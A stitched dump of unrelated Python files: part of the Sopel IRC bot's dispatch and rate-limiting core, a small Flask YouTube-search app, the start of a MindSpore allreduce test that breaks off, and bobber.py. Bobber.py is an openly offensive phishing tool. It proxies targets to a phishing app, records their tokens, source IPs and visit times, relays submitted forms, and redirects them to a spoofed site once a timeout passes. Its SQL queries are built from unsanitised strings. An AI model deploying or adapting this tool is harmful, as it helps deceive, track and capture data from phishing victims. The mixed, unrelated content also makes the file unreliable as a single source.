is_command = any([commands, nick_commands, action_commands])
if rules:
rule = plugin_rules.Rule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_rules:
try:
rule = plugin_rules.Rule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register rule: %s', err)
if find_rules:
rule = plugin_rules.FindRule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_find_rules:
try:
rule = plugin_rules.FindRule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register find rule: %s', err)
if search_rules:
rule = plugin_rules.SearchRule.from_callable(settings, callbl)
self._rules_manager.register(rule)
if lazy_search_rules:
try:
rule = plugin_rules.SearchRule.from_callable_lazy(
settings, callbl)
self._rules_manager.register(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error('Cannot register search rule: %s', err)
if commands:
rule = plugin_rules.Command.from_callable(settings, callbl)
self._rules_manager.register_command(rule)
if nick_commands:
rule = plugin_rules.NickCommand.from_callable(
settings, callbl)
self._rules_manager.register_nick_command(rule)
if action_commands:
rule = plugin_rules.ActionCommand.from_callable(
settings, callbl)
self._rules_manager.register_action_command(rule)
if not is_command and not is_rule:
callbl.rule = [match_any]
self._rules_manager.register(
plugin_rules.Rule.from_callable(self.settings, callbl))
def register_jobs(self, jobs):
for func in jobs:
job = sopel.tools.jobs.Job.from_callable(self.settings, func)
self._scheduler.register(job)
def unregister_jobs(self, jobs):
for job in jobs:
self._scheduler.remove_callable_job(job)
def register_shutdowns(self, shutdowns):
# Append plugin's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods = self.shutdown_methods + list(shutdowns)
def unregister_shutdowns(self, shutdowns):
self.shutdown_methods = [
shutdown
for shutdown in self.shutdown_methods
if shutdown not in shutdowns
]
def register_urls(self, urls):
for func in urls:
url_regex = getattr(func, 'url_regex', [])
url_lazy_loaders = getattr(func, 'url_lazy_loaders', None)
if url_regex:
rule = plugin_rules.URLCallback.from_callable(
self.settings, func)
self._rules_manager.register_url_callback(rule)
if url_lazy_loaders:
try:
rule = plugin_rules.URLCallback.from_callable_lazy(
self.settings, func)
self._rules_manager.register_url_callback(rule)
except plugins.exceptions.PluginError as err:
LOGGER.error("Cannot register URL callback: %s", err)
@deprecated(
reason="Replaced by `say` method.",
version='6.0',
removed_in='8.0')
def msg(self, recipient, text, max_messages=1):
"""Old way to make the bot say something on IRC.
:param str recipient: nickname or channel to which to send message
:param str text: message to send
:param int max_messages: split ``text`` into at most this many messages
if it is too long to fit in one (optional)
.. deprecated:: 6.0
Use :meth:`say` instead. Will be removed in Sopel 8.
"""
self.say(text, recipient, max_messages)
# message dispatch
def call_rule(self, rule, sopel, trigger):
# rate limiting
if not trigger.admin and not rule.is_unblockable():
if rule.is_rate_limited(trigger.nick):
return
if not trigger.is_privmsg and rule.is_channel_rate_limited(trigger.sender):
return
if rule.is_global_rate_limited():
return
# channel config
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
if '*' in disabled_plugins:
return
elif rule.get_plugin_name() in disabled_plugins:
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
disabled_commands = disabled_commands.get(rule.get_plugin_name(), [])
if rule.get_rule_label() in disabled_commands:
return
try:
rule.execute(sopel, trigger)
except KeyboardInterrupt:
raise
except Exception as error:
self.error(trigger, exception=error)
def call(self, func, sopel, trigger):
"""Call a function, applying any rate limits or other restrictions.
:param func: the function to call
:type func: :term:`function`
:param sopel: a SopelWrapper instance
:type sopel: :class:`SopelWrapper`
:param Trigger trigger: the Trigger object for the line from the server
that triggered this call
"""
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
# if channel has its own config section, check for excluded plugins/plugin methods
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
LOGGER.debug(
"Evaluating configuration for %s.%s in channel %s",
func.plugin_name, func.__name__, trigger.sender
)
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
# if "*" is used, we are disabling all plugins on provided channel
if '*' in disabled_plugins:
LOGGER.debug(
"All plugins disabled in %s; skipping execution of %s.%s",
trigger.sender, func.plugin_name, func.__name__
)
return
if func.plugin_name in disabled_plugins:
LOGGER.debug(
"Plugin %s is disabled in %s; skipping execution of %s",
func.plugin_name, trigger.sender, func.__name__
)
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
if func.plugin_name in disabled_commands:
if func.__name__ in disabled_commands[func.plugin_name]:
LOGGER.debug(
"Skipping execution of %s.%s in %s: disabled_commands matched",
func.plugin_name, func.__name__, trigger.sender
)
return
try:
exit_code = func(sopel, trigger)
except Exception as error: # TODO: Be specific
exit_code = None
self.error(trigger, exception=error)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def _is_pretrigger_blocked(self, pretrigger):
if self.settings.core.nick_blocks or self.settings.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
return (nick_blocked, host_blocked)
def dispatch(self, pretrigger):
"""Dispatch a parsed message to any registered callables.
:param pretrigger: a parsed message from the server
:type pretrigger: :class:`~sopel.trigger.PreTrigger`
The ``pretrigger`` (a parsed message) is used to find matching rules;
it will retrieve them by order of priority, and execute them. It runs
triggered rules in separate threads, unless they are marked otherwise.
However, it won't run triggered blockable rules at all when they can't
be executed for blocked nickname or hostname.
.. seealso::
The pattern matching is done by the
:class:`Rules Manager<sopel.plugins.rules.Manager>`.
"""
# list of commands running in separate threads for this dispatch
running_triggers = []
# nickname/hostname blocking
nick_blocked, host_blocked = self._is_pretrigger_blocked(pretrigger)
blocked = bool(nick_blocked or host_blocked)
list_of_blocked_rules = set()
# account info
nick = pretrigger.nick
user_obj = self.users.get(nick)
account = user_obj.account if user_obj else None
for rule, match in self._rules_manager.get_triggered_rules(self, pretrigger):
trigger = Trigger(self.settings, pretrigger, match, account)
is_unblockable = trigger.admin or rule.is_unblockable()
if blocked and not is_unblockable:
list_of_blocked_rules.add(str(rule))
continue
wrapper = SopelWrapper(
self, trigger, output_prefix=rule.get_output_prefix())
if rule.is_threaded():
# run in a separate thread
targs = (rule, wrapper, trigger)
t = threading.Thread(target=self.call_rule, args=targs)
plugin_name = rule.get_plugin_name()
rule_label = rule.get_rule_label()
t.name = '%s-%s-%s' % (t.name, plugin_name, rule_label)
t.start()
running_triggers.append(t)
else:
# direct call
self.call_rule(rule, wrapper, trigger)
# update currently running triggers
self._update_running_triggers(running_triggers)
if list_of_blocked_rules:
if nick_blocked and host_blocked:
block_type = 'both blocklists'
elif nick_blocked:
block_type = 'nick blocklist'
else:
block_type = 'host blocklist'
LOGGER.debug(
"%s prevented from using %s by %s.",
pretrigger.nick,
', '.join(list_of_blocked_rules),
block_type,
)
@property
def running_triggers(self):
"""Current active threads for triggers.
:return: the running thread(s) currently processing trigger(s)
:rtype: :term:`iterable`
This is for testing and debugging purposes only.
"""
with self._running_triggers_lock:
return [t for t in self._running_triggers if t.is_alive()]
def _update_running_triggers(self, running_triggers):
"""Update list of running triggers.
:param list running_triggers: newly started threads
We want to keep track of running triggers, mostly for testing and
debugging purposes. For instance, it'll help make sure, in tests, that
a bot plugin has finished processing a trigger, by manually joining
all running threads.
This is kept private, as it's purely internal machinery and isn't
meant to be manipulated by outside code.
"""
# update bot's global running triggers
with self._running_triggers_lock:
running_triggers = running_triggers + self._running_triggers
self._running_triggers = [
t for t in running_triggers if t.is_alive()]
# event handlers
def on_scheduler_error(self, scheduler, exc):
"""Called when the Job Scheduler fails.
:param scheduler: the job scheduler that errored
:type scheduler: :class:`sopel.plugins.jobs.Scheduler`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def on_job_error(self, scheduler, job, exc):
"""Called when a job from the Job Scheduler fails.
:param scheduler: the job scheduler responsible for the errored ``job``
:type scheduler: :class:`sopel.plugins.jobs.Scheduler`
:param job: the Job that errored
:type job: :class:`sopel.tools.jobs.Job`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def error(self, trigger=None, exception=None):
"""Called internally when a plugin causes an error.
:param trigger: the ``Trigger``\\ing line (if available)
:type trigger: :class:`sopel.trigger.Trigger`
:param Exception exception: the exception raised by the error (if
available)
"""
message = 'Unexpected error'
if exception:
message = '{} ({})'.format(message, exception)
if trigger:
message = '{} from {} at {}. Message was: {}'.format(
message, trigger.nick, str(datetime.utcnow()), trigger.group(0)
)
LOGGER.exception(message)
if trigger and self.settings.core.reply_errors and trigger.sender is not None:
self.say(message, trigger.sender)
def _host_blocked(self, host):
"""Check if a hostname is blocked.
:param str host: the hostname to check
"""
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
"""Check if a nickname is blocked.
:param str nick: the nickname to check
"""
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
"""Internal bot shutdown method."""
LOGGER.info("Shutting down")
# Stop Job Scheduler
LOGGER.info("Stopping the Job Scheduler.")
self._scheduler.stop()
try:
self._scheduler.join(timeout=15)
except RuntimeError:
LOGGER.exception("Unable to stop the Job Scheduler.")
else:
LOGGER.info("Job Scheduler stopped.")
self._scheduler.clear_jobs()
# Shutdown plugins
LOGGER.info(
"Calling shutdown for %d plugins.", len(self.shutdown_methods))
for shutdown_method in self.shutdown_methods:
try:
LOGGER.debug(
"Calling %s.%s",
shutdown_method.__module__,
shutdown_method.__name__)
shutdown_method(self)
except Exception as e:
LOGGER.exception("Error calling shutdown method: %s", e)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
# URL callbacks management
@deprecated(
reason='Issues with @url decorator have been fixed. Simply use that.',
version='7.1',
warning_in='8.0',
removed_in='9.0',
)
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to register
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to handle matching URLs
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if 'url_callbacks' not in bot.memory:
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.plugin.url`.
.. deprecated:: 7.1
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. versionchanged:: 8.0
Stores registered callbacks in an internal property instead of
``bot.memory['url_callbacks']``.
"""
if isinstance(pattern, str):
pattern = re.compile(pattern)
self._url_callbacks[pattern] = callback
@deprecated(
reason='Issues with @url decorator have been fixed. Simply use that.',
version='7.1',
warning_in='8.0',
removed_in='9.0',
)
def unregister_url_callback(self, pattern, callback):
"""Unregister the callback for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to unregister callback
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to remove
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.plugin.url`.
.. deprecated:: 7.1
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. versionchanged:: 8.0
Deletes registered callbacks from an internal property instead of
``bot.memory['url_callbacks']``.
"""
if isinstance(pattern, str):
pattern = re.compile(pattern)
try:
del self._url_callbacks[pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks whose regex pattern matches the ``url``.
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. versionchanged:: 8.0
Searches for registered callbacks in an internal property instead
of ``bot.memory['url_callbacks']``.
.. deprecated:: 8.0
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
for regex, function in self._url_callbacks.items():
match = regex.search(url)
if match:
yield function, match
def restart(self, message):
"""Disconnect from IRC and restart the bot.
:param str message: QUIT message to send (e.g. "Be right back!")
"""
self.wantsrestart = True
self.quit(message)
class SopelWrapper(object):
"""Wrapper around a Sopel instance and a Trigger.
:param sopel: Sopel instance
:type sopel: :class:`~sopel.bot.Sopel`
:param trigger: IRC Trigger line
:type trigger: :class:`~sopel.trigger.Trigger`
:param str output_prefix: prefix for messages sent through this wrapper
(e.g. plugin tag)
This wrapper will be used to call Sopel's triggered commands and rules as
their ``bot`` argument. It acts as a proxy to :meth:`send messages<say>`
to the sender (either a channel or in a private message) and even to
:meth:`reply to someone<reply>` in a channel.
"""
def __init__(self, sopel, trigger, output_prefix=''):
if not output_prefix:
# Just in case someone passes in False, None, etc.
output_prefix = ''
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
object.__setattr__(self, '_out_pfx', output_prefix)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1, truncation='', trailing=''):
"""Override ``Sopel.say`` to use trigger source by default.
:param str message: message to say
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param int max_messages: split ``message`` into at most this many
messages if it is too long to fit into one
line (optional)
:param str truncation: string to indicate that the ``message`` was
truncated (optional)
:param str trailing: string that should always appear at the end of
``message`` (optional)
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
For more details about the optional arguments to this wrapper
method, consult the documentation for :meth:`sopel.bot.Sopel.say`.
"""
if destination is None:
destination = self._trigger.sender
self._bot.say(self._out_pfx + message, destination, max_messages, truncation, trailing)
def action(self, message, destination=None):
"""Override ``Sopel.action`` to use trigger source by default.
:param str message: action message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.action`
"""
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
"""Override ``Sopel.notice`` to use trigger source by default.
:param str message: notice message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.notice`
"""
if destination is None:
destination = self._trigger.sender
self._bot.notice(self._out_pfx + message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
"""Override ``Sopel.reply`` to ``reply_to`` sender by default.
:param str message: reply message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param str reply_to: person to reply to; defaults to
:attr:`trigger.nick <sopel.trigger.Trigger.nick>`
:param bool notice: reply as an IRC notice or with a simple message
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
``reply_to`` will default to the nickname who sent the trigger.
.. seealso::
:meth:`sopel.bot.Sopel.reply`
"""
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def kick(self, nick, channel=None, message=None):
"""Override ``Sopel.kick`` to kick in a channel
:param str nick: nick to kick out of the ``channel``
:param str channel: optional channel to kick ``nick`` from
:param str message: optional message for the kick
The ``channel`` will default to the channel in which the call was
triggered. If triggered from a private message, ``channel`` is
required.
.. seealso::
:meth:`sopel.bot.Sopel.kick`
"""
if channel is None:
if self._trigger.is_privmsg:
raise RuntimeError('Error: KICK requires a channel.')
else:
channel = self._trigger.sender
if nick is None:
raise RuntimeError('Error: KICK requires a nick.')
self._bot.kick(nick, channel, message)
|
bobber.py
|
#!/usr/bin/env python3
import sys
from datetime import datetime
import time
from flask import Flask
from flask import request,Response
import requests
import urllib
from urllib.parse import urljoin
import sqlalchemy
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from bs4 import BeautifulSoup, SoupStrainer
import threading
import base64
app = Flask(__name__)
tokens = []
token = 1
TIMESTAMP = datetime.now().strftime("%d.%m.%y-%H-%M-%S")
############################
# CHANGE THESE VARIABLES
############################
# Path to file containing target user tokens/IDs (one per line)
TOKENS = "/path/to/tokens/file"
############################
# This should be the URL for this server - make sure they line up with
# any settings defined in the app.run() function at the bottom of this
# file
REDIRECT_DOMAIN = "https://my.flask.app:8443"
############################
# This should be the URL where your phishing app is hosted
PHISHAPP_DOMAIN = "https://my.app.url"
############################
# This site will be used when an invalid request is made,
# or if the user is locked out by accessing the server.
#
# This should be a valid URL to a site with legitimate content.
SPOOFED_DOMAIN = "https://some.other.content.com"
############################
# This should be what the app uses to identify a user token on landing
# eg if the url is https://myapp.com?userguid=1234 then use "userguid"
TOKEN_DELIMITER = "CHANGEME"
############################
# This is the value of time (in seconds) the user should be able to
# access the phishing app before getting redirected
TIMEOUT_LENGTH = 900
############################
# Update this file if you want to reuse a generated bobber DB
# otherwise, a new one will be generated at restart
#
# To stop using auto-generated files, do the below
#
# Comment the top line to stop automatically generating a DB
# Fill out the BOBBER_LOCATION variable and uncomment the last 2 lines
BOBBER_DB = ("sqlite:///bobber.%s.db" % (TIMESTAMP))
#BOBBER_LOCATION = "/path/to/file/bobber.db"
#BOBBER_DB = ("sqlite:///%s" % (BOBBER_LOCATION))
############################
# END CHANGES AFTER HERE
############################
# List of users who have accessed the app
# but shouldn't be locked out yet
INTERMEDIATE_ACCESS_LIST = []
engine = create_engine(BOBBER_DB,echo=False)
def dbinit():
#Gather tokens
f_token = open(TOKENS,"r")
line = f_token.readline()
while line:
tokens.append(line.rstrip())
line = f_token.readline()
f_token.close()
#Create db file
Base = declarative_base()
class Tokens(Base):
__tablename__ = 'tracker'
id = Column(Integer, primary_key=True)
userToken = Column(String)
hasAccessed = Column(Integer)
timeAccessed = Column(String)
sourceIP = Column(String)
def __init__(self, userToken, hasAccessed, timeAccessed):
self.userToken = userToken
self.hasAccessed = hasAccessed
self.timeAccessed = timeAccessed
self.sourceIP = sourceIP
Base.metadata.create_all(engine)
#Populate the database with user tokens
c = engine.connect()
t = c.begin()
for token in range(0,len(tokens)):
ins = 'INSERT INTO "tracker" (userToken,hasAccessed,timeAccessed,sourceIP) VALUES ("%s",0,"Not Accessed","0.0.0.0")' % (tokens[token])
c.execute(ins)
t.commit()
c.close()
def remove_access(userID):
if(userID in INTERMEDIATE_ACCESS_LIST):
sys.exit(0)
INTERMEDIATE_ACCESS_LIST.append(userID)
time.sleep(TIMEOUT_LENGTH)
INTERMEDIATE_ACCESS_LIST.remove(userID)
c = engine.connect()
t = c.begin()
lockout = c.execute('UPDATE tracker set hasAccessed=1 WHERE userToken="%s"' % (userID))
t.commit()
c.close()
def accessed(userID, sourceIP):
if(userID == False):
return 0
if userID in tokens:
c = engine.connect()
t = c.begin()
result = c.execute('SELECT "hasAccessed" FROM tracker WHERE "userToken" = "%s"' % (userID))
result = result.fetchone()
accessTimestamp = c.execute('UPDATE tracker SET timeAccessed="%s" where userToken="%s"' % (datetime.now().strftime("%d.%m.%y-%H-%M-%S"), userID))
source = c.execute('UPDATE tracker SET sourceIP="%s" where userToken="%s"' % (sourceIP, userID))
t.commit()
c.close()
if(result["hasAccessed"] == 0):
block = threading.Thread(target=remove_access, args=(userID,))
block.start()
return result["hasAccessed"]
return 1
def process_content(request, DOMAIN, **kwargs):
#Assign default values if not specified
try:
gargs = kwargs["gargs"]
except:
gargs = ""
try:
pargs = kwargs["pargs"]
except:
pargs = {}
try:
path = kwargs["path"]
except:
path = ""
if(request.method=="GET"):
#Go fetch the content of the specified domain
resp = requests.get(("%s/%s%s" % (DOMAIN,path,gargs)))
excluded_headers = ['content-encoding', 'content-length', 'transfer-encoding', 'connection']
headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
response = Response(resp.content, resp.status_code, headers)
elif(request.method=="POST"):
resp = requests.post(("%s/%s%s" % (DOMAIN,path,gargs)), data=pargs)
excluded_headers = ['content-encoding', 'content-length', 'transfer-encoding', 'connection']
headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers]
response = Response(resp.content, resp.status_code, headers)
#Replace all links to route through the flask app
soup = BeautifulSoup(response.data, "html.parser")
for url in soup.find_all('a'):
try:
if(url.get('href')[0] == "/"):
if(DOMAIN == PHISHAPP_DOMAIN):
url["href"] = ("%s%s" % (urljoin(REDIRECT_DOMAIN,url.get('href')),gargs))
else:
url["href"] = urljoin(REDIRECT_DOMAIN,url.get('href'))
except:
pass
for img in soup.find_all('img'):
try:
if(img.get('src')[0] == "/"):
imgex = str(img.get("src")[-3:])
ib64 = base64.b64encode(urllib.request.urlopen(urljoin(DOMAIN,img.get('src'))).read())
img["src"] = ("data:img/%s; base64,%s" % (imgex,ib64.decode("utf-8")))
except:
pass
for l in soup.find_all('link'):
try:
if(l.get('href')[0] == "/"):
l["href"] = urljoin(REDIRECT_DOMAIN,l.get('href'))
except:
pass
for s in soup.find_all('script'):
try:
if(s.get('src')[0] == "/"):
s["src"] = urljoin(REDIRECT_DOMAIN,s.get("src"))
continue
s = str(s).replace('src=\"/',('src=\"%s/\"' % (REDIRECT_DOMAIN)))
except Exception as e:
pass
for f in soup.find_all('form'):
try:
if(f.get('action')[0] == "/"):
f["action"] = urljoin(REDIRECT_DOMAIN,"%s%s" % (f.get("action"),gargs))
except:
pass
response.data = soup.prettify()
return response
#If the base url is requested
@app.route('/')
def index():
#Default fail
token = False
PHISHAPP_DELIM = False
#Grab the user ID from the end of the URL if it's there
try:
token = request.args[TOKEN_DELIMITER]
#If it's not there, move on
except Exception as e:
pass
if(TOKEN_DELIMITER in request.args):
PHISHAPP_DELIM = True
#If this is their first time accessing the site
if((not accessed(token,request.environ.get('HTTP_X_REAL_IP', request.remote_addr))) and PHISHAPP_DELIM):
gargs=""
if request.method=='GET':
#Gather GET arguments
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
#If not passing GET parameters
return process_content(request,PHISHAPP_DOMAIN,gargs=gargs)
#If requested via POST
elif request.method=='POST':
#Gather the POST arguments
pargs = {}
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
else:
gargs=("?%s=%s" % (TOKEN_DELIMITER, token))
for i in request.values:
pargs.update({ i : request.values[i]})
return process_content(request, PHISHAPP_DOMAIN,pargs=pargs,gargs=gargs)
else:
gargs=""
if request.method=='GET':
#Gather GET arguments
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
return process_content(request,SPOOFED_DOMAIN,gargs=gargs)
elif request.method=='POST':
#Gather the POST arguments
pargs = {}
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
else:
gargs=("?%s=%s" % (TOKEN_DELIMITER, token))
for i in request.values:
pargs.update({ i : request.values[i]})
return process_content(request, SPOOFED_DOMAIN,pargs=pargs,gargs=gargs)
#If specific urls are requested
@app.route('/<path:path>',methods=['GET','POST'])
def proxy(path):
#Default fail
token = False
PHISHAPP_DELIM = False
#Grab the user ID from the end of the URL if it's there
try:
token = request.args[TOKEN_DELIMITER]
#If it's not there, move on
except Exception as e:
pass
if(TOKEN_DELIMITER in request.args):
PHISHAPP_DELIM = True
#If there's no get args, it's likely not for the phishing app anymore
if(len(request.args) == 0) and (request.method == "GET"):
return process_content(request,SPOOFED_DOMAIN,path=path)
#If this is their first time visiting
if((not accessed(token,request.environ.get('HTTP_X_REAL_IP', request.remote_addr))) and PHISHAPP_DELIM):
#If requested via GET
gargs=""
if request.method=='GET':
#Gather GET arguments
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
return process_content(request, PHISHAPP_DOMAIN, path=path, gargs=gargs)
#If requested via POST
elif request.method=='POST':
#Gather the POST arguments
pargs = {}
if(len(request.args) >= 1):
gargs = "?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
else:
gargs=("?%s=%s" % (TOKEN_DELIMITER, token))
for i in request.values:
pargs.update({ i : request.values[i]})
return process_content(request, PHISHAPP_DOMAIN, path=path,pargs=pargs,gargs=gargs)
else:
#If this is not their first time visiting, or if the token is invalid
gargs = ""
#If requested via GET
if request.method=='GET':
if(len(request.args) >= 1):
gargs="?"
for key in request.args:
gargs += ("&%s=%s" % (key, request.args[key]))
#Go fetch the content of the spoofed domain
return process_content(request, SPOOFED_DOMAIN, path=path, gargs=gargs)
elif request.method=='POST':
args = {}
for i in request.values:
args.update({ i : request.values[i]})
#Go fetch the content of the spoofed domain
return process_content(request, SPOOFED_DOMAIN, path=path, gargs=gargs, pargs=args)
if __name__ == '__main__':
dbinit()
app.run(host="0.0.0.0", port="5000")
|
newer.py
|
from flask import Flask , request, jsonify
import requests
import time
import threading
import json
from youtube import Search,SearchMore,GetSong
def repeat():
while True:
time.sleep(180)
print(requests.get('https://gray-server.herokuapp.com/').text)
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'GrayHat : gray-hat.me'
@app.route('/search',methods=['POST'])
def search():
search = ''
try:
req_data = request.get_json()
search = req_data['search']
except:
return {'error' : 'search compulsory'}
try:
sess = req_data['sessionToken']
tok = req_data['continuation']
click = req_data['clickTrackingParams']
ob2 = SearchMore(sess,tok,click,search)
ob2.compute()
v2 = ob2.prepare()
return jsonify(v2)
except:
ob = Search(search)
ob.compute()
v2 = ob.prepare()
return jsonify(v2)
@app.route('/song',methods=['POST'])
def getSong():
req_data = request.get_json()
ytid = req_data['id']
return jsonify(GetSong(ytid).getSong())
if __name__ == '__main__':
t1 = threading.Thread(target=repeat)
t1.start()
app.run()
|
test_pynative_hccl_allreduce.py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test hccl allreduce performance with 8p"""
import os
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore import dtype as mstype
from mindspore.ops import operations as P
import mindspore.communication.management as D
from mindspore import context
from mindspore.context import ParallelMode
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
np.random.seed(1)
os.environ['GLOG_v'] = str(2)
class AllReduceNet(nn.Cell):
def __init__(self):
super(AllReduceNet, self).__init__()
self.mul = P.Mul()
self.all_reduce = P.AllReduce()
self.add = P.Add()
def construct(self, x):
x = self.mul(x, 2)
